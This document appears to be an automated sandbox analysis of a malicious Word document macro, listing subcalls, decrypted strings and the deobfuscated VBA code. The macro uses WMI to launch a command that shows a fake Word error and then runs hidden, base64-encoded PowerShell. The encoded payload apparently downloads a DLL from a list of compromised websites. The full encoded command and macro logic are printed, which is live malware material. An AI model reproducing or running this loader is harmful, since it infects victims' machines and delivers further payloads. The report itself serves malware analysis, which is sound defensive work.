Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC
Mid
Len	Len(" sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw) -> 21932
Create	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwB,,) -> 0
Twt08i5xpa9fd0
L1e1dxo2wbinf3l6
rlKgn
Paragraphs
igIuH
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
QgrUG

Strings	Decrypted Strings
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"sg yw ahpsg yw ah"
"sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"sg yw ahsg yw ah"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"

Line	Instruction	Meta Information
2	Function Xqcxarraokjbi()
3	On Error Resume Next	executed
4	V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp	O9eax2mx6bn5xuv Content Bud375u79tqnjtr8hp
5	Goto hnsxGG
6	Dim vpWmJA as Paragraph
7	Set HwQjGFBhp = bebkDqAH	bebkDqAH
8	For Each vpWmJA in Bcur5699z4d.Paragraphs	Paragraphs
9	Set yVvECoEYV = EWTFmUdCA	EWTFmUdCA
10	If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
11	hnsxGG = vpWmJA.Range.ListFormat.ListString	Range
12	Elseif InStr(vpWmJA.Range.Text, "kkiew") > 1 Then	InStr Range
13	elbdiLVN = vpWmJA.Range.Text	Range
14	elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG)	Replace saw
15	vpWmJA.Range.Text = elbdiLVN	Range
16	Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
17	Endif
18	Set BdbvZ = ueWFHDCC	ueWFHDCC
19	Next vpWmJA	Paragraphs
19	hnsxGG:
21	U7 = "sg yw ahpsg yw ah"
22	Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
23	Goto GHJmFFAIm
24	Dim ORjdHplF as Paragraph
25	Set twfalBEJ = yigPu	yigPu
26	For Each ORjdHplF in Bcur5699z4d.Paragraphs	Paragraphs
27	Set ATQXIsF = wTLHBUFzI	wTLHBUFzI
28	If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
29	GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString	Range
30	Elseif InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then	InStr Range
31	JozvGJc = ORjdHplF.Range.Text	Range
32	JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)	Replace saw
33	ORjdHplF.Range.Text = JozvGJc	Range
34	Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
35	Endif
36	Set QxPrAc = oSnKJGCv	oSnKJGCv
37	Next ORjdHplF	Paragraphs
37	GHJmFFAIm:
39	Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
40	Goto GLKaFEDcX
41	Dim kYUGGMJ as Paragraph
42	Set RpARJ = NVFQOFAXs	NVFQOFAXs
43	For Each kYUGGMJ in Bcur5699z4d.Paragraphs	Paragraphs
44	Set hHdBIMIgE = KoPDIC	KoPDIC
45	If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
46	GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString	Range
47	Elseif InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then	InStr Range
48	TpXhGgIp = kYUGGMJ.Range.Text	Range
49	TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)	Replace saw
50	kYUGGMJ.Range.Text = TpXhGgIp	Range
51	Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
52	Endif
53	Set iGMIJABIz = vlZuYFCC	vlZuYFCC
54	Next kYUGGMJ	Paragraphs
54	GLKaFEDcX:
56	Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
57	Goto QyjOFbQGB
58	Dim wNsHseJob as Paragraph
59	Set crnYCaC = mJzxEXG	mJzxEXG
60	For Each wNsHseJob in Bcur5699z4d.Paragraphs	Paragraphs
61	Set FdSuG = bssipAJC	bssipAJC
62	If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
63	QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString	Range
64	Elseif InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then	InStr Range
65	DrqvEr = wNsHseJob.Range.Text	Range
66	DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)	Replace saw
67	wNsHseJob.Range.Text = DrqvEr	Range
68	Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
69	Endif
70	Set HgufGDBpC = IpndaHM	IpndaHM
71	Next wNsHseJob	Paragraphs
71	QyjOFbQGB:
73	T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"	Mid Name Application
74	Goto DMzpFn
75	Dim MscjBIE as Paragraph
76	Set AZyYMo = lscaG	lscaG
77	For Each MscjBIE in Bcur5699z4d.Paragraphs	Paragraphs
78	Set cLxQFB = wgusFA	wgusFA
79	If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
80	DMzpFn = MscjBIE.Range.ListFormat.ListString	Range
81	Elseif InStr(MscjBIE.Range.Text, "kkiew") > 1 Then	InStr Range
82	RxTZR = MscjBIE.Range.Text	Range
83	RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)	Replace saw
84	MscjBIE.Range.Text = RxTZR	Range
85	Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
86	Endif
87	Set jdDhS = HpOdl	HpOdl
88	Next MscjBIE	Paragraphs
88	DMzpFn:
90	Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl
91	Goto uRNYED
92	Dim GvZhcxcBE as Paragraph
93	Set WLdYLJOB = PAyxzTsC	PAyxzTsC
94	For Each GvZhcxcBE in Bcur5699z4d.Paragraphs	Paragraphs
95	Set RYtzeF = sVBjGLE	sVBjGLE
96	If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
97	uRNYED = GvZhcxcBE.Range.ListFormat.ListString	Range
98	Elseif InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then	InStr Range
99	mNAmBCKAC = GvZhcxcBE.Range.Text	Range
100	mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)	Replace saw
101	GvZhcxcBE.Range.Text = mNAmBCKAC	Range
102	Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
103	Endif
104	Set kFOCACABC = RmTjACo	RmTjACo
105	Next GvZhcxcBE	Paragraphs
105	uRNYED:
107	H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)
108	Goto clyLjDhC
109	Dim VrghdcJA as Paragraph
110	Set kyTwIN = zjQpkF	zjQpkF
111	For Each VrghdcJA in Bcur5699z4d.Paragraphs	Paragraphs
112	Set xmKhhI = ClofCvn	ClofCvn
113	If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
114	clyLjDhC = VrghdcJA.Range.ListFormat.ListString	Range
115	Elseif InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then	InStr Range
116	LATJAGVFG = VrghdcJA.Range.Text	Range
117	LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)	Replace saw
118	VrghdcJA.Range.Text = LATJAGVFG	Range
119	Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
120	Endif
121	Set IyCjJCAKS = tFspDCJEJ	tFspDCJEJ
122	Next VrghdcJA	Paragraphs
122	clyLjDhC:
124	Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)	CreateObject("winmgmts:win32_process") executed
125	Goto CJIuIYEKI
126	Dim djUnAEBd as Paragraph
127	Set nATRHnACI = rknGHpIJ	rknGHpIJ
128	For Each djUnAEBd in Bcur5699z4d.Paragraphs	Paragraphs
129	Set PyQuEPBH = LGONCIz	LGONCIz
130	If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
131	CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString	Range
132	Elseif InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then	InStr Range
133	gnnIFFf = djUnAEBd.Range.Text	Range
134	gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)	Replace saw
135	djUnAEBd.Range.Text = gnnIFFf	Range
136	Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
137	Endif
138	Set AYQZHEBI = chPFBOFy	chPFBOFy
139	Next djUnAEBd	Paragraphs
139	CJIuIYEKI:
141	KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))	Mid Len(" sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw 